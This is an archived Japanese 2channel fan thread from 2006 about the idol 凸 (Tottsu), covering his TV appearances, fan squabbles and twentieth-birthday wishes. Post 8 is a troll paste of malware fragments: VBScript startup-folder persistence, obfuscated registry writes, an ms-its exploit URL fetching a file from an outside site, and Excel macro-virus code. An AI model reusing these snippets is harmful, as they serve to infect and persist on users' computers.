5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

キャワなハタチでも(^∀^)イイ!!しょたきゅん第23祥

1 :ユーは名無しネ:2006/10/27(金) 21:29:04
お約束
・ファンサ話はモメサの元なので禁止
・雑誌に載った話以外(噂・マガネタ)は禁止
・安置が自演してもスルー
・個人スレなのでsageでマターリ

前スレ
不器用でも(^∀^)イイ!!しょたきゅん第22祥
http://tv7.2ch.net/test/read.cgi/jr2/1158756069/l50

2 :ユーは名無しネ:2006/10/27(金) 21:31:19
ドキュモオーデに落ちて19回目
http://tv7.2ch.net/test/read.cgi/jr2/1136907554/
看護婦待たせて18年
http://tv7.2ch.net/test/read.cgi/jr2/1116998809/
役者17プレイ
http://tv7.2ch.net/test/read.cgi/jr/1112873067/
リズムに合わせて16
http://tv7.2ch.net/test/read.cgi/jr/1096108396/
ギタリスト15カウンターパンチ
http://music4.2ch.net/test/read.cgi/jr/1083860700/
見切れ14階
http://tv4.2ch.net/test/read.cgi/jr/1073528986/
挙動不審13日の金曜日
http://tv2.2ch.net/test/read.cgi/jr/1067012690/
お持ち12日間
http://tv2.2ch.net/test/read.cgi/jr/1061710423/
男11
http://tv2.2ch.net/test/read.cgi/jr/1052671748/
1-12:
http://jbbs.livedoor.jp/bbs/read.cgi/music/1521/1105007438/60
カルチョ観戦で寝不足20失点
http://tv7.2ch.net/test/read.cgi/jr2/1149171392/l50
キノコ頭でも(^∀^)イイ!!しょたきゅん第21祥
http://tv7.2ch.net/test/read.cgi/jr2/1155723194/l50


3 :ユーは名無しネ:2006/10/27(金) 22:15:18
乙デス ノシ

4 :ユーは名無しネ:2006/10/27(金) 22:15:24
>1
乙!

5 :ユーは名無しネ:2006/10/27(金) 22:15:51
>1


6 :ユーは名無しネ:2006/10/27(金) 22:15:54
緑チャソになってしまったスマソ

7 :ユーは名無しネ:2006/10/27(金) 22:16:47
来週のタモステwktk

8 :<body onload=window()>:2006/10/27(金) 23:37:27
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

9 :ユーは名無しネ:2006/10/27(金) 23:39:00
ひこまろ

10 :ユーは名無しネ:2006/10/27(金) 23:51:57
>3
わざと上げるなよ
どこかを上げてるからそうなったんだろ

だからウイルスも張られる
sageろ

11 :ユーは名無しネ:2006/10/27(金) 23:55:13
カッコは全角だよ
花畑でキモイスレタイだけど一応乙

12 :ユーは名無しネ:2006/10/28(土) 10:42:21
猜疑心強い奴がいて住み心地悪いなココ
前からだけど

13 :ユーは名無しネ:2006/10/28(土) 12:46:40
火曜日→百式
金曜日→タモステ
土曜日→裸
日曜日→ユーたち、鑢、少蔵


14 :ユーは名無しネ:2006/10/28(土) 12:54:20
すげーなおい
ズニア祭りだな

15 :ユーは名無しネ:2006/10/28(土) 13:59:09
雑談にいる安置キター

16 :ユーは名無しネ:2006/10/28(土) 21:00:52
218 名前: ユーは名無しネ 投稿日: 2001/06/09(土) 01:50
変な帽子にビクーリした。

17 :ユーは名無しネ:2006/10/28(土) 21:13:21
前スレ使えよ
また落ちるぞ

18 :ユーは名無しネ:2006/10/29(日) 05:49:02
晒しage

19 :ユーは名無しネ:2006/10/29(日) 10:49:51
きょうは やすみか

20 :ユーは名無しネ:2006/10/29(日) 20:26:59
前スレ最後楽しかった

21 :ユーは名無しネ:2006/10/29(日) 20:49:17
いい終わり方ダタよね

22 :ユーは名無しネ:2006/10/29(日) 21:17:03
提案してくれた979たんアリガトン
久々に楽しかった

23 :ユーは名無しネ:2006/10/29(日) 21:43:52
さてと今週は凸三昧
といっても週末からだけど

24 :ユーは名無しネ:2006/10/29(日) 22:10:28
最後提案したの自分だけどあっと言う間に埋まってウレシス
イイとこイパーイだな凸

25 :ユーは名無しネ:2006/10/30(月) 00:39:17
イイトコいっぱいあるけど
やっぱし凸の笑顔が1番スチ

26 :ユーは名無しネ:2006/10/30(月) 03:32:12


27 :ユーは名無しネ:2006/10/30(月) 03:34:55
チソ毛ライターで燃やしてやりたい

28 :ユーは名無しネ:2006/10/30(月) 09:44:26
海老氏スレと同一安置

29 :ユーは名無しネ:2006/10/31(火) 00:36:22
てかスレタイのAA全然違うのってわざとか?

30 :ユーは名無しネ:2006/10/31(火) 07:54:17
出雲の紺映像に映りこみあるかな


31 :ユーは名無しネ:2006/10/31(火) 13:13:18


32 :ユーは名無しネ:2006/10/31(火) 13:28:20
雑談にいる安置キタ━━━━━(゚∀゚)━━━━━!!!!

33 :ユーは名無しネ:2006/10/31(火) 15:12:29
>30
あるだろ

34 :ユーは名無しネ:2006/10/31(火) 15:57:10
>31=32自演乙
IP見えてるよ

35 :ユーは名無しネ:2006/10/31(火) 16:17:58
運営が凸スレにいるなんてスゴス(w

36 :ユーは名無しネ:2006/11/01(水) 02:16:05
百式絶対子猫出ないね
しょうがないけど
海老氏からも誰も出ないって寂しいな
せめて平等にしてほしい

37 :ユーは名無しネ:2006/11/01(水) 08:19:40
ゐが出ただろ

38 :ユーは名無しネ:2006/11/01(水) 13:09:49
ゐ以外出なかったりして
問題は再来週の面子
そこに海老氏いなかったらゐしか出ないっぽい

39 :ユーは名無しネ:2006/11/01(水) 16:36:39
凸って自分より漢字書けてる

40 :ユーは名無しネ:2006/11/01(水) 17:11:52


41 :ユーは名無しネ:2006/11/01(水) 18:26:24
英語も書けてる
まさか語学留学とか考えてるんじゃ…

42 :ユーは名無しネ:2006/11/01(水) 18:35:53
11

43 :ユーは名無しネ:2006/11/01(水) 18:53:22
曲作りの賜物だと思うが

44 :ユーは名無しネ:2006/11/01(水) 19:36:57
曲作るなら同じ堂でも堂島孝平タソを見習って
風を受けて走れとかmistyとか悲しみブルーとかコーラ曲とか名曲ばかり

45 :ユーは名無しネ:2006/11/01(水) 20:08:04
おたく
http://anime.2ch.net/otaku/

46 :ユーは名無しネ:2006/11/02(木) 11:52:11
明日出てくれるのか脳
心配で眠れない脳

47 :ユーは名無しネ:2006/11/02(木) 13:26:26
子猫はメインで出すんじゃない?

48 :ユーは名無しネ:2006/11/02(木) 13:34:34
運送オモ
特に凸プラム

49 :ユーは名無しネ:2006/11/02(木) 13:56:51
だといいけど何しろズニアは常に不安定だから
武道館紺にも出ないんじゃないかと昨日申し込み用紙きてやっと安心できたよ

50 :ユーは名無しネ:2006/11/02(木) 14:18:04
来ない
メルも来ない…

51 :ユーは名無しネ:2006/11/02(木) 16:37:32
ヒコマロきゅん

52 :ユーは名無しネ:2006/11/02(木) 19:32:52
ジャニーズメドレーらしいから出てくれる可能性大だけどそれでも出てくるまで心配だ
階段降り+雛壇は今回は無理かな・・・

53 :ユーは名無しネ:2006/11/02(木) 20:39:52
自分には今の凸が出ないなんて考えられないんだが
出ないかもと心配している姐さんは何で心配なんだ?
子猫にも入ってプシュされまくりなのに

54 :ユーは名無しネ:2006/11/02(木) 20:50:03
>53
西の件でCDデブしても安泰なんて事はないと分かったから
やっぱり明日のミニステの予告見るまでは不安だらけだよ


55 :ユーは名無しネ:2006/11/02(木) 23:16:58
メドレーで出るんだし前回の階段降りと同じ麺だと思って
良いんじゃないか

それにしても凸のメッセ大人だな漢字の使い分けとか
しっかりできてる男の中の男

56 :ユーは名無しネ:2006/11/03(金) 00:44:03
今日の歌ワラに海老氏ついたのかな

57 :ユーは名無しネ:2006/11/03(金) 21:09:47
タモステ凸かっこよかった

58 :ユーは名無しネ:2006/11/03(金) 21:31:42
少しイメチェンみたいでカコヨクなってたね
ミニステ階段降り雛壇十分満足した
背も高く見えたけどなんでだろう

59 :ユーは名無しネ:2006/11/03(金) 21:55:37
自分仕事でまだ見れナスなんだがカコヨスだたのか(w


60 :ユーは名無しネ:2006/11/03(金) 21:59:11
かなりカコヨスでしたよ
垢抜けてた感じ

61 :ユーは名無しネ:2006/11/03(金) 22:09:04
ちょっと外ハネの髪カバエエ
ミニステ後の紹介のときかなり明るい髪だったけよね
内容はイマイチだったが子猫ヒラメ楽しそうで満足

62 :ユーは名無しネ:2006/11/03(金) 22:22:10
子猫にヒラメいれてほしいな
みんなビズ安定してるし
華やかになる

63 :ユーは名無しネ:2006/11/03(金) 22:36:30
ヒラメとはナカヨスだし凸も嬉しいだろうな

64 :ユーは名無しネ:2006/11/03(金) 22:40:17
凸とヒラメ楽しそうに話してたね

65 :ユーは名無しネ:2006/11/03(金) 22:45:55
階段降りの後タモリとしゃべってるとき凸ありがとうございますとか
誰かに向かって言ってたけどあれって木梨と喋ってるように見えないか?
キーホルダーももらったみたいだし良かったな

66 :ユーは名無しネ:2006/11/03(金) 22:48:46
雛壇で次の曲ドゾーって時カメラにアピってたりしてて
後ろ見るのに疲れたが嬉しい一時間
ビギンの帽子がじゃまだった



67 :ユーは名無しネ:2006/11/03(金) 23:13:38
>65
確かに2人で話してるように見えるね
何話してたんだろうか
>66
帽子邪魔(w
FFの時苺と一緒に映ってた時の凸がマジキャワ

68 :ユーは名無しネ:2006/11/04(土) 10:07:16
>65
うん見える
ありがとうございますって笑顔でキャワだった

69 :ユーは名無しネ:2006/11/04(土) 12:24:24
来週の滝つSPメドレーにはもうつかない可能
ホッサマ歌うだろうしチビだらけの悪寒
最近バック外されてる事多いから(いい意味で)心配だ。゚(゚´Д`゚)゚。

70 :ユーは名無しネ:2006/11/04(土) 12:42:50
今やっと見れた
ズニア湧きすぎてて探すのバック付いてる時より大変だた…
でもアクロバット多いしキャワだたしヨカタ禿カクイかった

71 :ユーは名無しネ:2006/11/04(土) 14:14:15
途中でヒラメ担の自演が入ってるのバレバレでワロス

72 :ユーは名無しネ:2006/11/04(土) 14:44:20
>71
ageるな安置

73 :ユーは名無しネ:2006/11/04(土) 14:55:44
安置は凸とヒラメが普段から仲がいいのを知らない

74 :ユーは名無しネ:2006/11/04(土) 15:13:27
安置しねばいいのに


75 :ユーは名無しネ:2006/11/04(土) 18:59:58
安置と人気は比例するから嬉しいお
凸も偉くなったもんだ

76 :ユーは名無しネ:2006/11/04(土) 19:17:04
波レポ見た?
凸優しいね

77 :ユーは名無しネ:2006/11/04(土) 20:10:11
>75
ほんとだよな
ちょっと前までは
全然回ってないことも多かったのにな

78 :ユーは名無しネ:2006/11/04(土) 22:19:59
おてて繋いでなかよしこよし

79 :ユーは名無しネ:2006/11/04(土) 22:50:30
>76
凸ヤサスィ気配り惚れなおしますた

80 :ユーは名無しネ:2006/11/04(土) 23:18:04
凸はちびの面倒よくみてるよね
明日歌ワラ出るかな
CMではカツンの歌がなかったんだが

81 :ユーは名無しネ:2006/11/05(日) 12:47:00
夕立、凸キャワでウマーだったね

82 :ユーは名無しネ:2006/11/05(日) 12:51:33
ミニオムレツもキャワだたし何よりあのチャリの時の凸が萌えだた
もっとアップで撮れと言いたい

83 :ユーは名無しネ:2006/11/05(日) 14:48:08
ミニオムレツ?そんなのあったっけ?
あの番組下品だから下品なシーンになるとテレビからそむける癖がついた
チャリの時は爺だけ長く映してズニアの扱い悪いと思う
あれズニアの番組なのにカツンウザイ

84 :ユーは名無しネ:2006/11/05(日) 15:20:14
またヤラカシと密会か…
ヤラカシしかまわりに女いないのかよ

85 :ユーは名無しネ:2006/11/05(日) 15:20:33
チャリの映像予告のときの方が良く映ってるよね
本番は横アングルで怖がってるのが映ってない

オムレツ一人だけ食べてたしわかりにくいチャリの説明したり
なんだかんだ言っても楽しかった

86 :ユーは名無しネ:2006/11/05(日) 16:05:38
髪型よかった
少倉も期待

87 :ユーは名無しネ:2006/11/05(日) 16:08:31
あの食べてたのがオムレツだったのか
この番組編集できないのがいたいよね
下品なシーンはカットしたいんだけどちらちら映るから編集が面倒になってできない
少蔵まであと2時間切ったね
昨日の予告見たらキャワだったから安心して見れそう

88 :ユーは名無しネ:2006/11/05(日) 17:21:14
そういえば、トッティーってゲストから何回も呼ばれてたんだが惜しい…

89 :ユーは名無しネ:2006/11/05(日) 18:57:49
ヤパーリ髪形シャギーいれてセットした方がいいね
凸の街もよかった(ズニアとしては地味すぎる曲だけど
キャワ過ぎて来週のお手紙萌えシヌ
噂マンも来週だわねぇ

90 :ユーは名無しネ:2006/11/05(日) 19:23:30
街萌え氏んだ…
なんつうか色っぽい

91 :ユーは名無しネ:2006/11/05(日) 19:40:19
街歌ってる時はなんかエロキャワ

92 :ユーは名無しネ:2006/11/05(日) 20:39:57

ルックスだけで引かれた訳では決して無いが
最近のビズの良さは一体なんなんだ

93 :ユーは名無しネ:2006/11/05(日) 20:59:23
トッティーは夕立内でのよばれ方ジャマイカ?
それにしても夕立少蔵歌藁と凸マンセーな一日だったな

94 :ユーは名無しネ:2006/11/05(日) 21:05:37
>92
いや本当にそう
最近の凸ビズうpはスゴイね
何か自信を得たのかな?
>93
わざとなのかな?
来週のユーたちも楽しみだ

95 :ユーは名無しネ:2006/11/05(日) 21:07:54
引き気味だった凸が自ら前出るようになり
ビズアップし背も伸びなんだか色々変化してるよな

96 :ユーは名無しネ:2006/11/05(日) 21:13:11
ソロ歌った時の最後の表情が最高ですた

97 :ユーは名無しネ:2006/11/05(日) 21:17:31
アップがもっと見たいね
凄くビズいい

98 :ユーは名無しネ:2006/11/05(日) 21:31:21
さすがハタチ目前の男の中の男は一味違うな

99 :ユーは名無しネ:2006/11/05(日) 21:38:01
街を歌ってる凸は男を感じたね
キャワな凸と男っぽい凸と二通り楽しめた一日でした
また来週も凸萌えの日曜日になるといいな

100 :ユーは名無しネ:2006/11/05(日) 22:11:23
エンディング曲の凸のどチ○コに萌え〜〜
なんか凸の顔が鳥サンに見えたキャワ
マジにオフェンスの心でガンガンガンガッテルな

101 :ユーは名無しネ:2006/11/05(日) 22:39:16
オフェンスの心で
攻めの姿勢みたいな感じのこと?

102 :ユーは名無しネ:2006/11/05(日) 22:39:28
凸どつよの夏に出した曲歌って欲しいな
ロックっぽい曲は不得意なのかな?

103 :ユーは名無しネ:2006/11/05(日) 22:41:30
>101だが
オフェンスの心て
に訂正orzスマソ

104 :ユーは名無しネ:2006/11/05(日) 22:46:51
そんなに変わったかな
変わった気がしない

105 :ユーは名無しネ:2006/11/05(日) 22:57:24
中身は変わってないけど外見がマジでうpしたとオモー
思えばめざましお台場あたりのビズがチト酷かった

106 :ユーは名無しネ:2006/11/05(日) 22:58:46
そうですよ
オフェンス 攻め
ディフェンス 守り だとオモー

107 :ユーは名無しネ:2006/11/05(日) 23:07:29
よく分からないけど日ハムの小笠原選手のように与えられた仕事を精一杯頑張れ!
みんなから好かれる凸でいてね
ウザくない空気読める凸でこれからも・・・

108 :ユーは名無しネ:2006/11/05(日) 23:14:56
ユーたちでとっつー呼びが定着すればいいんだけど
それには子猫のコーナーとか作って欲しい

109 :ユーは名無しネ:2006/11/05(日) 23:17:19
>106
dです
凸は空気読めるから
ウザがられない程度の攻めが出来そうな希ガス

110 :ユーは名無しネ:2006/11/06(月) 02:59:47
759 :ユー&名無しネ:2006/11/06(月) 02:43:51 ID:TAm7Irbz
今日ソロあって目汁
なんだかんだで目強運
チビジュはイラネだったが厄介者いなくなっておいしいと気付いた
しかしこの時期に派手な髪型アピは安置呼び込むな


亀梨ヲタは海老氏なんかイラネだそうです
ウタワラでの目のオハバンパーマ巻きは「トイプードルみたいでキャワ☆」だそうです

111 :ユーは名無しネ:2006/11/06(月) 04:11:39
誤爆と思ったらわざわざココに甜菜か
暇だから書くけどカツン担って小足まで認識できてるんだよな
ルシエル読むと玉ファソ多いし
今日チビなんていたっけか?
海老氏と小足だけだと思ったが
何はともあれカツンはメインズニア、海老氏小足はバックズニアだから
別にどうでもいいことなんだが
ただあのパーマは確かにおかしい、やりすぎ

112 :ユーは名無しネ:2006/11/06(月) 09:13:30
自演?

113 :ユーは名無しネ:2006/11/06(月) 17:43:45
片目紙の凸キャワワ(*´д`*)
ビズが良すぎて戸惑ってしまう

114 :ユーは名無しネ:2006/11/06(月) 17:55:38
全然劣化しない凸ってスゴス

115 :ユーは名無しネ:2006/11/06(月) 19:01:59
ピンナップになってるの見て目汁だよ
記事もイイし子猫対談も面白い

116 :ユーは名無しネ:2006/11/06(月) 19:15:11
明日買わなきゃね
子猫好きだから早く読みたい

117 :ユーは名無しネ:2006/11/07(火) 00:05:06
自演多いな

118 :ユーは名無しネ:2006/11/07(火) 04:22:29
淋しいね

119 :ユーは名無しネ:2006/11/07(火) 08:04:15
何でも自演にしたがる奴いい加減ウザイ
子猫マンセーが気に入らないならどっか池

120 :ユーは名無しネ:2006/11/07(火) 11:45:30
凸は海老氏
これからも海老氏

121 :ユーは名無しネ:2006/11/07(火) 13:26:25
子猫好きだから素直に書いた
自演って書いてあるレスは安置の自演

海老氏では埋もれてる凸だけど子猫では普通に目立ってる

122 :ユーは名無しネ:2006/11/07(火) 14:45:27
子猫に入れたから週に1回日曜日昼のゴールデンの日テレで凸を見れてる訳でして
これはもう感謝するしかないよ
ダンスではいつも見切れな位置なのにキセキだよ

123 :ユーは名無しネ:2006/11/07(火) 15:50:03
海老氏と子猫で違う凸が見れてありがたいよ
片目誌の子猫対談でも海老氏じゃ出してないキャラ暴露されてるしな

それにしても凸若返ったな急行との集合写真見つけるの大変だった

124 :ユーは名無しネ:2006/11/07(火) 16:17:55
>123
若返ったのか?
急行=ほとんど中学生と紛れても普通に見れるってスゴイぞ

125 :ユーは名無しネ:2006/11/07(火) 16:42:22
あの写真はホント若いと思う
凸以外の海老氏麺はお兄さんオーラ出してるのに


126 :ユーは名無しネ:2006/11/07(火) 16:46:31
あの写真って急行面との写真か?


127 :ユーは名無しネ:2006/11/07(火) 18:35:10
晒しアゲ

128 :ユーは名無しネ:2006/11/07(火) 19:28:02
来週の百式大魔人とリンスタソなんだね
もしかしてと思ったけど海老氏足急行からも出ないって事は
当然子猫面には回ってこなさそうだね。゚(゚´Д`゚)゚。

129 :ユーは名無しネ:2006/11/07(火) 19:57:57
>128
D誌でゐの発言受けて俺はまだ出てないから楽しみみたいに言ってたよ
まだって事はいつかは出るかもとオモタ
入れ替え制だし希望持て


130 :ユーは名無しネ:2006/11/07(火) 20:12:01
>129
dそうなんだ
まだ出る可能性はあるんだ
いつまで待てばいいんだ。゚(゚´Д`゚)゚。

131 :ユーは名無しネ:2006/11/07(火) 20:39:58
まだ始まったばっかじゃん
贅沢に慣れちゃダメだよ

132 :ユーは名無しネ:2006/11/07(火) 21:10:20
凸最近よく宙返りするようになった
上手くなってるし

133 :ユーは名無しネ:2006/11/07(火) 21:13:06
夕立が見られない地域なので百式早く出て欲しい
贅沢言っちゃいけないのはわかってるんだけど見たい

134 :ユーは名無しネ:2006/11/07(火) 21:14:33
>132
フライハイの時は緊張からかぐしゃっとしてた
>133
友達とか親戚に撮ってもらえば
あれは見た方がいいよ

135 :ユーは名無しネ:2006/11/07(火) 23:20:35
撮って貰える環境にあるなら
もうとっくに頼んでると思うよ
毎週快く撮ってくれる知人なんて一握りダロー

136 :ユーは名無しネ:2006/11/08(水) 00:04:17
>135
じゃ2掲に金原って頼めば(・∀・)イイ!!

137 :ユーは名無しネ:2006/11/08(水) 11:49:45
百式ミニドラマの部分が1回目位だからつまらなくなってきた
出ても出なくてもどうでもいいや
ただ3人固定はやめてほしい
いろんなズニアが見たいし

138 :ユーは名無しネ:2006/11/09(木) 02:19:11
百識くらいネットで落とせよ
10分でDL出来るわ

139 :ユーは名無しネ:2006/11/09(木) 12:18:09
夕立見れないって話してるのにネー


140 :ユーは名無しネ:2006/11/09(木) 14:04:48
>138
それ違法ですから

141 :ユーは名無しネ:2006/11/10(金) 02:08:09
しょたきゅんもうほんのちょっとで20歳(ハタチ)だね
13日になる前にみんなでカウントダウンしましょ

142 :ユーは名無しネ:2006/11/10(金) 15:04:29
>140
DLは違法じゃない
それをアップロードすると違法

143 :ユーは名無しネ:2006/11/10(金) 21:15:28
まだハワイなのかよ
ハワイで誕生日かよ

144 :ユーは名無しネ:2006/11/10(金) 23:03:55
滝つバックの凸見たかったのになorz

145 :ユーは名無しネ:2006/11/11(土) 01:02:32
本当に見たかったな
最近バックは少蔵と歌ワラ以外ちびばっか
歌ワラはバック映らないしタモステで見たいのに

146 :ユーは名無しネ:2006/11/11(土) 03:03:13


147 :ユーは名無しネ:2006/11/12(日) 01:46:21
今日で十代最後

148 :ユーは名無しネ:2006/11/12(日) 19:41:44
お手紙の時の凸が最高杉て目汁が・・・

149 :ユーは名無しネ:2006/11/12(日) 20:00:44
「ソメイヨシノ」告白「やっぱ好きやねん」もありがとう
凸担でホントによかったよ
幸せだぁ
もうすぐハタチだね


150 :ユーは名無しネ:2006/11/12(日) 20:02:53
お手紙ヨカタね!なんか素の凸が見れた感じ
ソメイヨシノも萌えだた声がスチ

151 :ユーは名無しネ:2006/11/12(日) 21:18:57
凸がカコヨスギ
どうして最近ビズうpしたんだろう
べ、別に整形してないよ!
本当に顔がどんどん劣化どころかうpしていく(´・ω・`)
ヘンな現象
だけど面白キャラは変わってナス(*´∀`*)

152 :ユーは名無しネ:2006/11/12(日) 21:28:57
ホントに今日は凸担当でよかったとしみじみ思った
新聞TV欄に凸の名前あっただけで目汁だった

153 :ユーは名無しネ:2006/11/12(日) 21:32:13
担当の10代最後の日に最高な凸が見れてヨカタよね

154 :ユーは名無しネ:2006/11/12(日) 21:42:09
>153
姐さんイイ事言うねえ

155 :ユーは名無しネ:2006/11/12(日) 22:16:10
噂マン今日やってた?
見れてないんで教えてチャソでスマソ

156 :ユーは名無しネ:2006/11/12(日) 22:29:45
>155
やってないとオモー

157 :ユーは名無しネ:2006/11/12(日) 22:34:31
2週続けてズニアにQ
噂マンが見たかった

158 :ユーは名無しネ:2006/11/12(日) 22:35:10
噂マンなかったよ
あと約90プンでハタチだね

159 :ユーは名無しネ:2006/11/12(日) 22:36:58
凸お手紙の時かんで「ずーっとエンデロスで」って言ってたな・・・
そんな所もキャワ

160 :ユーは名無しネ:2006/11/12(日) 22:42:17
歌藁でもいっぱい映ってて目汁
凸楽しそうダタ

161 :ユーは名無しネ:2006/11/12(日) 23:03:51
>156-158
dです
噂マンなかったのか・・・残念

162 :ユーは名無しネ:2006/11/12(日) 23:16:32
歌藁ロババックかなり良いな
ビークリした


163 :ユーは名無しネ:2006/11/12(日) 23:32:36
歌ワラ最高ダタ
いつも見切れなのにあんなに映してくれるとはアリガタヤ
歌ワラ来週も出るのかな

164 :ユーは名無しネ:2006/11/13(月) 00:01:31
凸ハタチオメ(*´∀`)ノシ

165 :ユーは名無しネ:2006/11/13(月) 00:02:03
凸ハタチオメ!!
これからも笑顔がキャワで自由な凸でいてくれよ
やっぱ凸が好っきゃねん!!

166 :ユーは名無しネ:2006/11/13(月) 00:03:35
凸おめでとう!
これからもずっと応援するよ!

167 :ユーは名無しネ:2006/11/13(月) 00:04:01
誕生日オメ
20代もキャワでなお且つ男の中の男な凸を期待してるよ

168 :ユーは名無しネ:2006/11/13(月) 00:06:12
おめでとう凸
素敵な20代になりますように


169 :ユーは名無しネ:2006/11/13(月) 00:08:02
凸おめでd
ハタチはまだまだ若いよねwww
来年も今より明るい未来が確実に待ってるよ
夢に向かって頑張れ!
応援するぞ!


170 :ユーは名無しネ:2006/11/13(月) 00:12:00
凸20歳オメ!
凸にとって素敵な1年になりますように。

171 :ユーは名無しネ:2006/11/13(月) 00:13:38
凸おめでd
ソメイヨシノで13日迎えたよ
これからも自分の道を突き進んでおくれ

172 :ユーは名無しネ:2006/11/13(月) 00:22:09
凸二十歳オメ!
大人の階段登りつつますます男前さとキャワさに磨きかけておくれ


173 :ユーは名無しネ:2006/11/13(月) 00:24:56
凸ハタチのお誕生日おめでとう!
凸にとって20歳が幸せな年になりますように!

174 :ユーは名無しネ:2006/11/13(月) 00:48:55
凸二十歳オメ!
これからもずっとついてくよー
ありがとう

175 :ユーは名無しネ:2006/11/13(月) 03:04:44
ハタチの誕生日オメ!!
すごいことがイパーイおきる年になるのかな
いつまでもついてく!
凸ダイスチだー

176 :sage:2006/11/13(月) 04:53:59
凸誕生日オメ!
やっと大人の仲間入りだなー
素敵な年にしろよ


177 :ユーは名無しネ:2006/11/13(月) 07:56:55
凸ハタチおめでとん
凸にとってMAXサイコーな一年になるよう願ってるよ
またスッパマンに変身してねん

178 :ユーは名無しネ:2006/11/13(月) 10:42:04
凸誕生日おめでとう!
夢をつかむためにこれからもがんばってね!
これからもずっと応援していくからねー

179 :ユーは名無しネ:2006/11/13(月) 14:40:40
凸おめでとう
ハタチになっても今のままの凸でいて下さい
10代以上に楽しいことがイパーイになりますように

180 :ユーは名無しネ:2006/11/13(月) 14:55:53
凸ハタチ誕生日オメデト
キャワなところはずっと変わらずにいてね

181 :ユーは名無しネ:2006/11/13(月) 15:06:49
凸ハタチの誕生日おめでとう!
これからも自分を信じて歩いていってね
凸にはきっと輝く未来がまってるよ!

182 :ユーは名無しネ:2006/11/13(月) 18:41:21
トッツーショータおめでとう!

183 :ユーは名無しネ:2006/11/13(月) 19:19:35
凸ハタチのお誕生日おめでとう!
20代の凸も担も幸せでありますように

184 :ユーは名無しネ:2006/11/13(月) 19:42:57
凸おめでとう!!!
凸の笑顔にいつも元気貰ってます!!!
いつもありがとう!!!

185 :ユーは名無しネ:2006/11/13(月) 20:31:26
凸20歳おめでとう
こんなキャワな20歳凸以外いません
これからもキャワでいてね

186 :ユーは名無しネ:2006/11/13(月) 21:12:37
凸おめ
ヲタやってきて幸せだよ
これからも楽しませてくり

187 :ユーは名無しネ:2006/11/13(月) 21:55:17
凸おめでとう!
君の笑顔に癒されて頑張ってるよ
『ソメイヨシノ』本当にヨカッタよ
今年一年良い年になりますように

188 :ユーは名無しネ:2006/11/13(月) 22:07:12
凸お誕生日おめでとう!!
笑顔いっぱい!応援してるよ!

189 :ユーは名無しネ:2006/11/13(月) 22:28:35
遅くなったが凸誕生日オメ
凸のすべてが大好きだ
これからもずっと応援していくよ

190 :ユーは名無しネ:2006/11/13(月) 22:57:08
通りすがりの他担ですが
凸くんハタチなんですね
お誕生日おめでとうございます
自担の歌歌ってくれてありがとうです

191 :ユーは名無しネ:2006/11/13(月) 23:07:35
凸おめ!!!!!!!!!

192 :ユーは名無しネ:2006/11/14(火) 13:00:47
円鳥担ですが凸クン誕生日オメデト!
凸クンの歌声大好きだよ
一日遅れスマソ

193 :ユーは名無しネ:2006/11/15(水) 00:54:23


194 :ユーは名無しネ:2006/11/15(水) 01:06:15
>190
>192
他担姐さんありがd

195 :ユーは名無しネ:2006/11/16(木) 05:12:15
プ

196 :ユーは名無しネ:2006/11/16(木) 06:27:11
凸引っ越したんだね

197 :ユーは名無しネ:2006/11/16(木) 15:04:06
>195
律儀に誕生日の日は荒らしにこなかったんた
お前いい奴じゃん

198 :ユーは名無しネ:2006/11/16(木) 15:47:11
理想としては

海老氏でカツンや滝つのバックにつきまくって
子猫でレギュラー番組を持って歌いまくりがいい
歌ワラではまだバックにつかせてくれるから理想的
でも最近はテレビで滝つバックにはつかないけどね

199 :ユーは名無しネ:2006/11/16(木) 17:00:39
>198
爽!
今が一番幸せかもな

200 :ユーは名無しネ:2006/11/16(木) 18:42:06
明日環八つかないかな

201 :ユーは名無しネ:2006/11/17(金) 21:09:09
つかなかったなorz

202 :ユーは名無しネ:2006/11/17(金) 22:19:44
甘受押してるね
紺も甘受連れてくるよね
横蟻海老氏つくのか分からなくなった

203 :ユーは名無しネ:2006/11/18(土) 12:24:05


204 :ユーは名無しネ:2006/11/18(土) 14:36:10
環八には甘受
それ以外はズニアでそ

205 :ユーは名無しネ:2006/11/18(土) 20:13:54
どちらにしろ環八に出ても出番かなり少ないよね
たぶん海老氏足急行は出ないっぽいけど

206 :ユーは名無しネ:2006/11/18(土) 20:31:23
環八横アリ→12/29(金) 13:30 17:30

29日(金)はタモステスペサルでPもカツンも出るからズニアつく
ズニアはもちろん海老氏足急行
よって環八には甘受無所が自動的に決まったということでFA


207 :ユーは名無しネ:2006/11/19(日) 12:05:59
ひこまろ

208 :ユーは名無しネ:2006/11/19(日) 13:22:47
今日の夕立うますぎた

209 :ユーは名無しネ:2006/11/19(日) 13:58:35
エンディングのところね確かに

210 :ユーは名無しネ:2006/11/19(日) 17:41:57
明日の少蔵リストだけ見ると詰らなさそうだ
先月がソロもあって良過ぎたせいもあるけど
オリ曲は足鑢急行が増えたけど海老氏は増えないねぇ
自分は海老氏のオリ曲には拘らないけど他ユニと差をつけられた感じでチト感じ悪
その分歌ワラに毎週ついてくれたら全然問題ないけど

211 :ユーは名無しネ:2006/11/19(日) 18:26:56
クレアク久々に聞けて嬉し
毎回収録行く前は出番少なそうに思えるけど実際
